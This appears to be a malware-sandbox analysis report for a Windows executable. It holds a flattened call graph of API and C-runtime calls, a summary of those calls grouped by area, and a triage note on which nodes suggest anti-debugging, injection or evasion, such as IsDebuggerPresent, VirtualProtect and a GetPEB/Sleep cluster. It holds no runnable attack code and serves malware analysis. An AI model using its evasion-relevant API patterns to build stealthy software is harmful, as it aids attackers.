                                      execution_graph 86281 4010e0 86284 401100 86281->86284 86283 4010f8 86285 401113 86284->86285 86286 401182 86285->86286 86288 401120 86285->86288 86289 401184 86285->86289 86290 40114c 86285->86290 86287 40112c DefWindowProcW 86286->86287 86287->86283 86288->86287 86343 401000 Shell_NotifyIconW __call_reportfault 86288->86343 86322 401250 86289->86322 86292 401151 86290->86292 86293 40119d 86290->86293 86297 401219 86292->86297 86298 40115d 86292->86298 86295 4011a3 86293->86295 86296 42afb4 86293->86296 86294 401193 86294->86283 86295->86288 86305 4011b6 KillTimer 86295->86305 86306 4011db SetTimer RegisterWindowMessageW 86295->86306 86338 40f190 10 API calls 86296->86338 86297->86288 86301 401225 86297->86301 86299 401163 86298->86299 86300 42b01d 86298->86300 86307 42afe9 86299->86307 86308 40116c 86299->86308 86300->86287 86342 4370f4 52 API calls 86300->86342 86354 468b0e 74 API calls __call_reportfault 86301->86354 86304 42b04f 86344 40e0c0 86304->86344 86337 401000 Shell_NotifyIconW __call_reportfault 86305->86337 86306->86294 86313 401204 CreatePopupMenu 86306->86313 86340 40f190 10 API calls 86307->86340 86308->86288 86315 401174 86308->86315 86313->86283 86339 45fd57 65 API calls __call_reportfault 86315->86339 86316 42afe4 86316->86294 86317 42b00e 86341 401a50 330 API calls 86317->86341 86318 4011c9 PostQuitMessage 86318->86283 86321 42afdc 86321->86287 86321->86316 86323 401262 __call_reportfault 86322->86323 86324 4012e8 86322->86324 86355 401b80 86323->86355 86324->86294 86326 4012d1 KillTimer SetTimer 86326->86324 86327 40128c 86327->86326 86328 4012bb 86327->86328 86329 4272ec 86327->86329 86332 4012c5 86328->86332 86333 42733f 86328->86333 86330 4272f4 Shell_NotifyIconW 86329->86330 86331 42731a Shell_NotifyIconW 86329->86331 86330->86326 86331->86326 86332->86326 86334 427393 Shell_NotifyIconW 86332->86334 86335 427348 Shell_NotifyIconW 86333->86335 86336 42736e Shell_NotifyIconW 86333->86336 86334->86326 
86335->86326 86336->86326 86337->86318 86338->86294 86339->86321 86340->86317 86341->86286 86342->86286 86343->86304 86346 40e0e7 __call_reportfault 86344->86346 86345 40e142 86352 40e184 86345->86352 86453 4341e6 63 API calls __wcsicoll 86345->86453 86346->86345 86347 42729f DestroyIcon 86346->86347 86347->86345 86349 40e1a0 Shell_NotifyIconW 86351 401b80 54 API calls 86349->86351 86350 4272db Shell_NotifyIconW 86353 40e1ba 86351->86353 86352->86349 86352->86350 86353->86286 86354->86316 86356 401b9c 86355->86356 86357 401c7e 86355->86357 86377 4013c0 86356->86377 86357->86327 86360 42722b LoadStringW 86363 427246 86360->86363 86361 401bb9 86382 402160 86361->86382 86396 40e0a0 86363->86396 86364 401bcd 86366 427258 86364->86366 86367 401bda 86364->86367 86400 40d200 52 API calls 2 library calls 86366->86400 86367->86363 86368 401be4 86367->86368 86395 40d200 52 API calls 2 library calls 86368->86395 86371 427267 86372 42727b 86371->86372 86374 401bf3 _wcscpy __call_reportfault _wcsncpy 86371->86374 86401 40d200 52 API calls 2 library calls 86372->86401 86376 401c62 Shell_NotifyIconW 86374->86376 86375 427289 86376->86357 86402 4115d7 86377->86402 86383 426daa 86382->86383 86384 40216b _wcslen 86382->86384 86440 40c600 86383->86440 86387 402180 86384->86387 86388 40219e 86384->86388 86386 426db5 86386->86364 86439 403bd0 52 API calls ctype 86387->86439 86390 4013a0 52 API calls 86388->86390 86391 4021a5 86390->86391 86392 426db7 86391->86392 86393 4115d7 52 API calls 86391->86393 86394 402187 _memmove 86393->86394 86394->86364 86395->86374 86397 40e0b2 86396->86397 86398 40e0a8 86396->86398 86397->86374 86452 403c30 52 API calls _memmove 86398->86452 86400->86371 86401->86375 86404 4115e1 _malloc 86402->86404 86405 4013e4 86404->86405 86407 4115fd std::exception::exception 86404->86407 86416 4135bb 86404->86416 86413 4013a0 86405->86413 86411 41163b 86407->86411 86430 41130a 51 API calls __cinit 86407->86430 86408 411645 86432 418105 RaiseException 86408->86432 
[Execution graph: in the original report this section is an interactive call-graph widget. Its flattened node and edge data (node id, function address, the API names or C-runtime symbols on each node, and "src->dst" edges) is not readable as text and is not reproduced here; the Windows API calls that appear on the graph's nodes are summarized instead.]

API calls on graph nodes, by area:
Loader and process: LoadLibraryA, GetModuleHandleW, GetProcAddress, FreeLibrary, GetModuleFileNameW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStartupInfoW, GetCurrentProcess, TerminateProcess, ExitProcess, GetPEB, WaitForSingleObject, GetExitCodeProcess, CloseHandle
Memory: HeapCreate, HeapAlloc, RtlAllocateHeap, RtlFreeHeap, VirtualProtect, TlsAlloc, TlsSetValue, CoTaskMemAlloc, CoTaskMemFree, SHGetMalloc
Debugging and error handling: IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetLastError, MessageBoxA
Registry: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
COM and automation: OleInitialize, CLSIDFromProgID, CLSIDFromString, CoCreateInstance, CoCreateInstanceEx, CoInitializeSecurity, CoSetProxyBlanket, VariantInit, VariantCopy, VariantClear
Shell and UI: ShellExecuteW, GetForegroundWindow, GetOpenFileNameW, Shell_NotifyIconW, RegisterClassExW, CreateWindowExW, ShowWindow, DestroyWindow, LockWindowUpdate, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, SystemParametersInfoW, GetSysColorBrush, LoadCursorW, LoadIconW, LoadImageW, EnumResourceNamesW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetFullPathNameW
Timing and synchronization: Sleep, timeGetTime, GetSystemTimeAsFileTime, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, GetStdHandle, GetFileType, SetHandleCount
String and I/O: WideCharToMultiByte, plus the statically linked C-runtime helpers (_malloc, _free, _memmove, _wcslen, _wcscpy, _fseek, __fread_nolock, __initterm_e, __RTC_Initialize, _doexit) that make up most of the remaining nodes.

Note for triage: a large share of the graph is the MSVC C runtime rather than sample-specific code. In particular the chain under __call_reportfault (addresses 417daa through 421ff8) that calls IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess and TerminateProcess is the runtime's fault-reporting path, so an IsDebuggerPresent hit there does not by itself indicate a deliberate anti-debugging check. The nodes worth reading against the injection and anti-analysis signatures listed at the top of this report are the separate IsDebuggerPresent at 40d5b6 that branches to MessageBoxA (42e1bb), the GetModuleFileNameW to GetForegroundWindow to ShellExecuteW sequence (42e25a, 42e2cb, 42e299), the RegOpenKeyExW/RegQueryValueExW/RegCloseKey block starting at 40e4cb, the VirtualProtect at 410da9, the OleInitialize to CLSIDFromProgID/CLSIDFromString to CoCreateInstance/CoCreateInstanceEx to CoSetProxyBlanket chain from 46cbc5 onward, and a small cluster at 3f39870 through 3f3cd5a (GetPEB, Sleep) that lies outside the 0x40xxxx address range of the rest of the graph.
414ec9 87790->87793 87838 417f77 46 API calls __getptd_noexit 87791->87838 87793->87788 87794 41e1f4 __write 51 API calls 87793->87794 87795 414f64 87794->87795 87795->87788 87796 41e1f4 __write 51 API calls 87795->87796 87796->87788 87798 414455 87797->87798 87799 414477 87797->87799 87798->87799 87800 414139 _fprintf 46 API calls 87798->87800 87803 414139 87799->87803 87801 414470 87800->87801 87839 41b7b2 77 API calls 5 library calls 87801->87839 87804 414145 87803->87804 87805 41415a 87803->87805 87840 417f77 46 API calls __getptd_noexit 87804->87840 87805->87775 87807 41414a 87841 417f25 10 API calls __vswprintf_l 87807->87841 87809 414155 87809->87775 87811 41e200 _fprintf 87810->87811 87812 41e223 87811->87812 87813 41e208 87811->87813 87814 41e22f 87812->87814 87819 41e269 87812->87819 87862 417f8a 46 API calls __getptd_noexit 87813->87862 87864 417f8a 46 API calls __getptd_noexit 87814->87864 87817 41e20d 87863 417f77 46 API calls __getptd_noexit 87817->87863 87818 41e234 87865 417f77 46 API calls __getptd_noexit 87818->87865 87842 41ae56 87819->87842 87823 41e23c 87866 417f25 10 API calls __vswprintf_l 87823->87866 87824 41e26f 87827 41e291 87824->87827 87828 41e27d 87824->87828 87825 41e215 _fprintf 87825->87771 87867 417f77 46 API calls __getptd_noexit 87827->87867 87852 41e17f 87828->87852 87831 41e289 87869 41e2c0 LeaveCriticalSection __unlock_fhandle 87831->87869 87832 41e296 87868 417f8a 46 API calls __getptd_noexit 87832->87868 87835->87771 87836->87785 87837->87788 87838->87788 87839->87799 87840->87807 87841->87809 87843 41ae62 _fprintf 87842->87843 87844 41aebc 87843->87844 87847 4182cb __lock 46 API calls 87843->87847 87845 41aec1 EnterCriticalSection 87844->87845 87846 41aede _fprintf 87844->87846 87845->87846 87846->87824 87848 41ae8e 87847->87848 87849 41aeaa 87848->87849 87850 41ae97 InitializeCriticalSectionAndSpinCount 87848->87850 87851 41aeec ___lock_fhandle LeaveCriticalSection 87849->87851 87850->87849 87851->87844 87853 41aded 
__commit 46 API calls 87852->87853 87854 41e18e 87853->87854 87855 41e1a4 SetFilePointer 87854->87855 87856 41e194 87854->87856 87858 41e1c3 87855->87858 87859 41e1bb GetLastError 87855->87859 87857 417f77 __vswprintf_l 46 API calls 87856->87857 87860 41e199 87857->87860 87858->87860 87861 417f9d __dosmaperr 46 API calls 87858->87861 87859->87858 87860->87831 87861->87860 87862->87817 87863->87825 87864->87818 87865->87823 87866->87825 87867->87832 87868->87831 87869->87825 87871 4149ea 87870->87871 87872 4149fe 87870->87872 87916 417f77 46 API calls __getptd_noexit 87871->87916 87873 4149fa 87872->87873 87875 41443c __flush 77 API calls 87872->87875 87888 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87873->87888 87878 414a0a 87875->87878 87876 4149ef 87917 417f25 10 API calls __vswprintf_l 87876->87917 87889 41d8c2 87878->87889 87881 414139 _fprintf 46 API calls 87882 414a18 87881->87882 87893 41d7fe 87882->87893 87884 414a1e 87884->87873 87885 413748 _free 46 API calls 87884->87885 87885->87873 87886->87617 87887->87621 87888->87621 87890 41d8d2 87889->87890 87892 414a12 87889->87892 87891 413748 _free 46 API calls 87890->87891 87890->87892 87891->87892 87892->87881 87894 41d80a _fprintf 87893->87894 87895 41d812 87894->87895 87896 41d82d 87894->87896 87933 417f8a 46 API calls __getptd_noexit 87895->87933 87897 41d839 87896->87897 87903 41d873 87896->87903 87935 417f8a 46 API calls __getptd_noexit 87897->87935 87899 41d817 87934 417f77 46 API calls __getptd_noexit 87899->87934 87902 41d83e 87936 417f77 46 API calls __getptd_noexit 87902->87936 87905 41ae56 ___lock_fhandle 48 API calls 87903->87905 87906 41d879 87905->87906 87908 41d893 87906->87908 87909 41d887 87906->87909 87907 41d846 87937 417f25 10 API calls __vswprintf_l 87907->87937 87938 417f77 46 API calls __getptd_noexit 87908->87938 87918 41d762 87909->87918 87913 41d88d 87939 41d8ba LeaveCriticalSection __unlock_fhandle 87913->87939 87914 41d81f _fprintf 87914->87884 87916->87876 
87917->87873 87940 41aded 87918->87940 87920 41d7c8 87953 41ad67 47 API calls 2 library calls 87920->87953 87921 41d772 87921->87920 87922 41d7a6 87921->87922 87924 41aded __commit 46 API calls 87921->87924 87922->87920 87925 41aded __commit 46 API calls 87922->87925 87928 41d79d 87924->87928 87929 41d7b2 CloseHandle 87925->87929 87926 41d7d0 87927 41d7f2 87926->87927 87954 417f9d 46 API calls 3 library calls 87926->87954 87927->87913 87931 41aded __commit 46 API calls 87928->87931 87929->87920 87932 41d7be GetLastError 87929->87932 87931->87922 87932->87920 87933->87899 87934->87914 87935->87902 87936->87907 87937->87914 87938->87913 87939->87914 87941 41ae12 87940->87941 87942 41adfa 87940->87942 87945 417f8a __write_nolock 46 API calls 87941->87945 87946 41ae51 87941->87946 87943 417f8a __write_nolock 46 API calls 87942->87943 87944 41adff 87943->87944 87947 417f77 __vswprintf_l 46 API calls 87944->87947 87948 41ae23 87945->87948 87946->87921 87949 41ae07 87947->87949 87950 417f77 __vswprintf_l 46 API calls 87948->87950 87949->87921 87951 41ae2b 87950->87951 87952 417f25 __vswprintf_l 10 API calls 87951->87952 87952->87949 87953->87926 87954->87927 87956 414c82 _fprintf 87955->87956 87957 414cbb _fprintf 87956->87957 87958 414cc3 87956->87958 87959 414c96 __call_reportfault 87956->87959 87957->87626 87960 415471 __lock_file 47 API calls 87958->87960 87982 417f77 46 API calls __getptd_noexit 87959->87982 87961 414ccb 87960->87961 87968 414aba 87961->87968 87964 414cb0 87983 417f25 10 API calls __vswprintf_l 87964->87983 87970 414ad8 __call_reportfault 87968->87970 87974 414af2 87968->87974 87969 414ae2 88035 417f77 46 API calls __getptd_noexit 87969->88035 87970->87969 87970->87974 87979 414b2d 87970->87979 87972 414ae7 88036 417f25 10 API calls __vswprintf_l 87972->88036 87984 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87974->87984 87976 414c38 __call_reportfault 88038 417f77 46 API calls __getptd_noexit 87976->88038 87977 414139 _fprintf 46 API 
calls 87977->87979 87979->87974 87979->87976 87979->87977 87985 41dfcc 87979->87985 88015 41d8f3 87979->88015 88037 41e0c2 46 API calls 3 library calls 87979->88037 87982->87964 87983->87957 87984->87957 87986 41dfd8 _fprintf 87985->87986 87987 41dfe0 87986->87987 87988 41dffb 87986->87988 88108 417f8a 46 API calls __getptd_noexit 87987->88108 87990 41e007 87988->87990 87993 41e041 87988->87993 88110 417f8a 46 API calls __getptd_noexit 87990->88110 87991 41dfe5 88109 417f77 46 API calls __getptd_noexit 87991->88109 87996 41e063 87993->87996 87997 41e04e 87993->87997 87995 41e00c 88111 417f77 46 API calls __getptd_noexit 87995->88111 88000 41ae56 ___lock_fhandle 48 API calls 87996->88000 88113 417f8a 46 API calls __getptd_noexit 87997->88113 88003 41e069 88000->88003 88001 41e014 88112 417f25 10 API calls __vswprintf_l 88001->88112 88002 41e053 88114 417f77 46 API calls __getptd_noexit 88002->88114 88006 41e077 88003->88006 88007 41e08b 88003->88007 88005 41dfed _fprintf 88005->87979 88039 41da15 88006->88039 88115 417f77 46 API calls __getptd_noexit 88007->88115 88011 41e083 88117 41e0ba LeaveCriticalSection __unlock_fhandle 88011->88117 88012 41e090 88116 417f8a 46 API calls __getptd_noexit 88012->88116 88016 41d900 88015->88016 88019 41d915 88015->88019 88121 417f77 46 API calls __getptd_noexit 88016->88121 88018 41d905 88122 417f25 10 API calls __vswprintf_l 88018->88122 88021 41d94a 88019->88021 88026 41d910 88019->88026 88118 420603 88019->88118 88023 414139 _fprintf 46 API calls 88021->88023 88024 41d95e 88023->88024 88025 41dfcc __read 59 API calls 88024->88025 88027 41d965 88025->88027 88026->87979 88027->88026 88028 414139 _fprintf 46 API calls 88027->88028 88029 41d988 88028->88029 88029->88026 88030 414139 _fprintf 46 API calls 88029->88030 88031 41d994 88030->88031 88031->88026 88032 414139 _fprintf 46 API calls 88031->88032 88033 41d9a1 88032->88033 88034 414139 _fprintf 46 API calls 88033->88034 88034->88026 88035->87972 88036->87974 88037->87979 
88038->87972 88040 41da31 88039->88040 88041 41da4c 88039->88041 88042 417f8a __write_nolock 46 API calls 88040->88042 88043 41da5b 88041->88043 88046 41da7a 88041->88046 88045 41da36 88042->88045 88044 417f8a __write_nolock 46 API calls 88043->88044 88047 41da60 88044->88047 88049 417f77 __vswprintf_l 46 API calls 88045->88049 88048 41da98 88046->88048 88059 41daac 88046->88059 88050 417f77 __vswprintf_l 46 API calls 88047->88050 88051 417f8a __write_nolock 46 API calls 88048->88051 88060 41da3e 88049->88060 88053 41da67 88050->88053 88055 41da9d 88051->88055 88052 41db02 88054 417f8a __write_nolock 46 API calls 88052->88054 88056 417f25 __vswprintf_l 10 API calls 88053->88056 88057 41db07 88054->88057 88058 417f77 __vswprintf_l 46 API calls 88055->88058 88056->88060 88061 417f77 __vswprintf_l 46 API calls 88057->88061 88062 41daa4 88058->88062 88059->88052 88059->88060 88063 41dae1 88059->88063 88064 41db1b 88059->88064 88060->88011 88061->88062 88065 417f25 __vswprintf_l 10 API calls 88062->88065 88063->88052 88071 41daec ReadFile 88063->88071 88066 416b04 __malloc_crt 46 API calls 88064->88066 88065->88060 88068 41db31 88066->88068 88074 41db59 88068->88074 88075 41db3b 88068->88075 88069 41dc17 88070 41df8f GetLastError 88069->88070 88078 41dc2b 88069->88078 88072 41de16 88070->88072 88073 41df9c 88070->88073 88071->88069 88071->88070 88082 417f9d __dosmaperr 46 API calls 88072->88082 88087 41dd9b 88072->88087 88076 417f77 __vswprintf_l 46 API calls 88073->88076 88079 420494 __lseeki64_nolock 48 API calls 88074->88079 88077 417f77 __vswprintf_l 46 API calls 88075->88077 88080 41dfa1 88076->88080 88081 41db40 88077->88081 88078->88087 88088 41dc47 88078->88088 88091 41de5b 88078->88091 88083 41db67 88079->88083 88084 417f8a __write_nolock 46 API calls 88080->88084 88085 417f8a __write_nolock 46 API calls 88081->88085 88082->88087 88083->88071 88084->88087 88085->88060 88086 413748 _free 46 API calls 88086->88060 88087->88060 88087->88086 88089 41dcab ReadFile 
88088->88089 88096 41dd28 88088->88096 88092 41dcc9 GetLastError 88089->88092 88101 41dcd3 88089->88101 88090 41ded0 ReadFile 88093 41deef GetLastError 88090->88093 88099 41def9 88090->88099 88091->88087 88091->88090 88092->88088 88092->88101 88093->88091 88093->88099 88094 41ddec MultiByteToWideChar 88094->88087 88095 41de10 GetLastError 88094->88095 88095->88072 88096->88087 88097 41dda3 88096->88097 88098 41dd96 88096->88098 88104 41dd60 88096->88104 88097->88104 88105 41ddda 88097->88105 88100 417f77 __vswprintf_l 46 API calls 88098->88100 88099->88091 88103 420494 __lseeki64_nolock 48 API calls 88099->88103 88100->88087 88101->88088 88102 420494 __lseeki64_nolock 48 API calls 88101->88102 88102->88101 88103->88099 88104->88094 88106 420494 __lseeki64_nolock 48 API calls 88105->88106 88107 41dde9 88106->88107 88107->88094 88108->87991 88109->88005 88110->87995 88111->88001 88112->88005 88113->88002 88114->88001 88115->88012 88116->88011 88117->88005 88119 416b04 __malloc_crt 46 API calls 88118->88119 88120 420618 88119->88120 88120->88021 88121->88018 88122->88026 88126 4148b3 GetSystemTimeAsFileTime __aulldiv 88123->88126 88125 442c6b 88125->87629 88126->88125 88127->87636 88128->87641 88129->87641 88135 45272f __tzset_nolock _wcscpy 88130->88135 88131 414d04 61 API calls __fread_nolock 88131->88135 88132 44afef GetSystemTimeAsFileTime 88132->88135 88133 4528a4 88133->87558 88133->87559 88134 4150d1 81 API calls _fseek 88134->88135 88135->88131 88135->88132 88135->88133 88135->88134 88137 44b1bc 88136->88137 88139 44b1ca 88136->88139 88138 4149c2 116 API calls 88137->88138 88138->88139 88140 4149c2 116 API calls 88139->88140 88141 44b1d8 88139->88141 88142 44b1e1 88139->88142 88143 44b2db 88140->88143 88141->87586 88171 4321a4 88142->88171 88143->88142 88145 44b2e9 88143->88145 88147 44b2f6 88145->88147 88150 414a46 __fcloseall 82 API calls 88145->88150 88146 44b224 88148 44b253 88146->88148 88149 44b228 88146->88149 88147->87586 88175 43213d 88148->88175 
88152 44b235 88149->88152 88155 414a46 __fcloseall 82 API calls 88149->88155 88150->88147 88153 44b245 88152->88153 88156 414a46 __fcloseall 82 API calls 88152->88156 88153->87586 88154 44b25a 88157 44b260 88154->88157 88158 44b289 88154->88158 88155->88152 88156->88153 88160 44b26d 88157->88160 88162 414a46 __fcloseall 82 API calls 88157->88162 88185 44b0bf 88158->88185 88163 44b27d 88160->88163 88165 414a46 __fcloseall 82 API calls 88160->88165 88161 44b28f 88194 4320f8 88161->88194 88162->88160 88163->87586 88165->88163 88167 44b2a2 88169 44b2b2 88167->88169 88170 414a46 __fcloseall 82 API calls 88167->88170 88168 414a46 __fcloseall 82 API calls 88168->88167 88169->87586 88170->88169 88172 4321cb 88171->88172 88174 4321b4 __tzset_nolock _memmove 88171->88174 88173 414d04 __fread_nolock 61 API calls 88172->88173 88173->88174 88174->88146 88176 4135bb _malloc 46 API calls 88175->88176 88177 432150 88176->88177 88178 4135bb _malloc 46 API calls 88177->88178 88179 432162 88178->88179 88180 4135bb _malloc 46 API calls 88179->88180 88181 432174 88180->88181 88182 4320f8 46 API calls 88181->88182 88183 432189 88181->88183 88184 432198 88182->88184 88183->88154 88184->88154 88186 44b18e 88185->88186 88190 44b0da 88185->88190 88204 43206e 79 API calls 88186->88204 88188 442caf 61 API calls 88188->88190 88189 44b194 88189->88161 88190->88186 88190->88188 88193 44b19d 88190->88193 88202 44b040 61 API calls 88190->88202 88203 442d48 79 API calls 88190->88203 88193->88161 88195 432109 88194->88195 88198 43210f 88194->88198 88196 413748 _free 46 API calls 88195->88196 88196->88198 88197 432122 88200 432135 88197->88200 88201 413748 _free 46 API calls 88197->88201 88198->88197 88199 413748 _free 46 API calls 88198->88199 88199->88197 88200->88167 88200->88168 88201->88200 88202->88190 88203->88190 88204->88189 88205->87489 88206->87491 88207->87509 88208->87509 88209->87509 88210->87503 88211->87509 88212->87509 88213->87514 88214->87522 88215->87523 88216->87523 88266 410160 
88217->88266 88219 41012f GetFullPathNameW 88220 410147 ctype 88219->88220 88220->87350 88222 4102cb SHGetDesktopFolder 88221->88222 88225 410333 _wcsncpy 88221->88225 88223 4102e0 _wcsncpy 88222->88223 88222->88225 88224 41031c SHGetPathFromIDListW 88223->88224 88223->88225 88224->88225 88225->87353 88227 4101bb 88226->88227 88234 425f4a 88226->88234 88228 410160 52 API calls 88227->88228 88229 4101c7 88228->88229 88270 410200 52 API calls 2 library calls 88229->88270 88230 4114ab __wcsicoll 58 API calls 88230->88234 88232 4101d6 88271 410200 52 API calls 2 library calls 88232->88271 88233 425f6e 88233->87355 88234->88230 88234->88233 88236 4101e9 88236->87355 88238 40f760 128 API calls 88237->88238 88239 40f584 88238->88239 88240 429335 88239->88240 88241 40f58c 88239->88241 88242 4528bd 118 API calls 88240->88242 88243 40f598 88241->88243 88244 429358 88241->88244 88245 42934b 88242->88245 88296 4033c0 113 API calls 7 library calls 88243->88296 88297 434034 86 API calls _wprintf 88244->88297 88248 429373 88245->88248 88249 42934f 88245->88249 88253 4115d7 52 API calls 88248->88253 88252 431e58 82 API calls 88249->88252 88250 429369 88250->88248 88251 40f5b4 88251->87352 88252->88244 88265 4293c5 ctype 88253->88265 88254 42959c 88262 401b10 52 API calls 88262->88265 88265->88254 88265->88262 88272 444af8 88265->88272 88275 44b41c 88265->88275 88282 402780 88265->88282 88290 4022d0 88265->88290 88298 44c7dd 64 API calls 3 library calls 88265->88298 88267 410167 _wcslen 88266->88267 88268 4115d7 52 API calls 88267->88268 88269 41017e _wcscpy 88268->88269 88269->88219 88270->88232 88271->88236 88273 4115d7 52 API calls 88272->88273 88276 44b429 88275->88276 88296->88251 88297->88250 88298->88265 88300 402417 88299->88300 88301 402539 ctype 88299->88301 88300->88301 88302 4115d7 52 API calls 88300->88302 88301->87359 88304 402443 88302->88304 88303 4115d7 52 API calls 88305 4024b4 88303->88305 88304->88303 88305->88301 88307 4022d0 52 API calls 88305->88307 88328 
402880 95 API calls 2 library calls 88305->88328 88307->88305 88312 401566 88308->88312 88309 401794 88329 40e9a0 90 API calls 88309->88329 88312->88309 88313 4010a0 52 API calls 88312->88313 88314 40167a 88312->88314 88313->88312 88315 4017c0 88314->88315 88330 45e737 90 API calls 3 library calls 88314->88330 88315->87361 88317 40bc70 52 API calls 88316->88317 88326 40d451 88317->88326 88318 40d50f 88333 410600 52 API calls 88318->88333 88320 427c01 88334 45e737 90 API calls 3 library calls 88320->88334 88321 40e0a0 52 API calls 88321->88326 88323 401b10 52 API calls 88323->88326 88324 40d519 88324->87364 88326->88318 88326->88320 88326->88321 88326->88323 88326->88324 88331 40f310 53 API calls 88326->88331 88332 40d860 91 API calls 88326->88332 88328->88305 88329->88314 88330->88315 88331->88326 88332->88326 88333->88324 88334->88324 88335->87377 88336->87378 88338 42c5fe 88337->88338 88353 4091c6 88337->88353 88339 40bc70 52 API calls 88338->88339 88338->88353 88340 42c64e InterlockedIncrement 88339->88340 88341 42c665 88340->88341 88346 42c697 88340->88346 88343 42c672 InterlockedDecrement Sleep InterlockedIncrement 88341->88343 88341->88346 88342 42c737 InterlockedDecrement 88344 42c74a 88342->88344 88343->88341 88343->88346 88347 408f40 VariantClear 88344->88347 88345 42c731 88345->88342 88346->88342 88346->88345 88348 408e80 VariantClear 88346->88348 88349 42c752 88347->88349 88350 42c6cf 88348->88350 88615 410c60 VariantClear ctype 88349->88615 88352 45340c 85 API calls 88350->88352 88354 42c6db 88352->88354 88353->87438 88355 402160 52 API calls 88354->88355 88356 42c6e5 88355->88356 88357 45340c 85 API calls 88356->88357 88358 42c6f1 88357->88358 88396 40afc4 88395->88396 88397 40b156 88395->88397 88398 40afd5 88396->88398 88399 42d1e3 88396->88399 88622 45e737 90 API calls 3 library calls 88397->88622 88404 40a780 199 API calls 88398->88404 88420 40b11a ctype 88398->88420 88623 45e737 90 API calls 3 library calls 88399->88623 88402 42d1f8 88408 408f40 
VariantClear 88402->88408 88403 40b143 88403->87438 88405 40b00a 88404->88405 88405->88402 88409 40b012 88405->88409 88407 42d4db 88407->88407 88408->88403 88410 40b04a 88409->88410 88411 40b094 ctype 88409->88411 88412 42d231 VariantClear 88409->88412 88419 40b05c ctype 88410->88419 88624 40e270 VariantClear ctype 88410->88624 88413 40b108 88411->88413 88416 42d425 ctype 88411->88416 88412->88419 88413->88420 88625 40e270 VariantClear ctype 88413->88625 88414 42d45a VariantClear 88414->88420 88416->88414 88416->88420 88417 4115d7 52 API calls 88417->88411 88419->88411 88419->88417 88420->88403 88626 45e737 90 API calls 3 library calls 88420->88626 88422 408fff 88421->88422 88425 40900d 88421->88425 88673 403ea0 52 API calls __cinit 88422->88673 88426 42c3f6 88425->88426 88428 40a780 199 API calls 88425->88428 88429 42c44a 88425->88429 88432 42c47b 88425->88432 88433 42c4cb 88425->88433 88434 42c564 88425->88434 88437 42c548 88425->88437 88441 409112 88425->88441 88443 42c528 88425->88443 88445 4090df 88425->88445 88446 4090ea 88425->88446 88455 4090f2 ctype 88425->88455 88675 4534e3 52 API calls 88425->88675 88677 40c4e0 199 API calls 88425->88677 88676 45e737 90 API calls 3 library calls 88426->88676 88428->88425 88678 45e737 90 API calls 3 library calls 88429->88678 88679 451b42 61 API calls 88432->88679 88627 47faae 88433->88627 88438 408f40 VariantClear 88434->88438 88683 45e737 90 API calls 3 library calls 88437->88683 88438->88455 88439 42c491 88439->88455 88680 45e737 90 API calls 3 library calls 88439->88680 88441->88437 88448 40912b 88441->88448 88682 45e737 90 API calls 3 library calls 88443->88682 88445->88446 88450 408e80 VariantClear 88445->88450 88451 408f40 VariantClear 88446->88451 88448->88455 88674 403e10 53 API calls 88448->88674 88450->88446 88451->88455 88453 40914b 88454 408f40 VariantClear 88453->88454 88454->88455 88455->87438 88457 425c87 88456->88457 88458 40d15f 88456->88458 88459 425cc7 88457->88459 88460 425ca1 TranslateAcceleratorW 
88457->88460 88458->87438 88460->88458 88462 42602f 88461->88462 88465 40d17f 88461->88465 88462->87438 88463 40d18c 88463->87438 88464 42608e IsDialogMessageW 88464->88463 88464->88465 88465->88463 88465->88464 88873 430c46 GetClassLongW 88465->88873 88468 4096c6 _wcslen 88467->88468 88469 40a70c ctype _memmove 88468->88469 88470 4115d7 52 API calls 88468->88470 88473 4013a0 52 API calls 88469->88473 88471 4096fa _memmove 88470->88471 88472 4115d7 52 API calls 88471->88472 88474 40971b 88472->88474 88475 4297aa 88473->88475 88474->88469 88476 409749 CharUpperBuffW 88474->88476 88481 40976a ctype 88474->88481 88477 4115d7 52 API calls 88475->88477 88476->88481 88478 4297d1 _memmove 88477->88478 88900 45e737 90 API calls 3 library calls 88478->88900 88487 4097e5 ctype 88481->88487 88875 47dcbb 201 API calls 88481->88875 88482 408f40 VariantClear 88483 42ae92 88482->88483 88901 410c60 VariantClear ctype 88483->88901 88485 42aea4 88486 409aa2 88486->88478 88489 4115d7 52 API calls 88486->88489 88492 409afe 88486->88492 88487->88478 88487->88486 88488 40a689 88487->88488 88491 40c2c0 52 API calls 88487->88491 88498 429a46 VariantClear 88487->88498 88504 408f40 VariantClear 88487->88504 88508 4115d7 52 API calls 88487->88508 88511 40a6af ctype _memmove 88487->88511 88515 40ba10 52 API calls 88487->88515 88520 4299d9 88487->88520 88524 429abd 88487->88524 88531 40a780 199 API calls 88487->88531 88536 42a452 88487->88536 88876 40c4e0 199 API calls 88487->88876 88878 40e270 VariantClear ctype 88487->88878 88490 4115d7 52 API calls 88488->88490 88489->88492 88490->88511 88491->88487 88493 409b2a 88492->88493 88494 4115d7 52 API calls 88492->88494 88495 429dbe 88493->88495 88557 409b4d ctype _memmove 88493->88557 88882 40b400 VariantClear VariantClear ctype 88493->88882 88496 429d31 88494->88496 88497 429dd3 88495->88497 88883 40b400 VariantClear VariantClear ctype 88495->88883 88501 429d42 88496->88501 88879 44a801 52 API calls 88496->88879 88497->88557 88498->88487 88499 
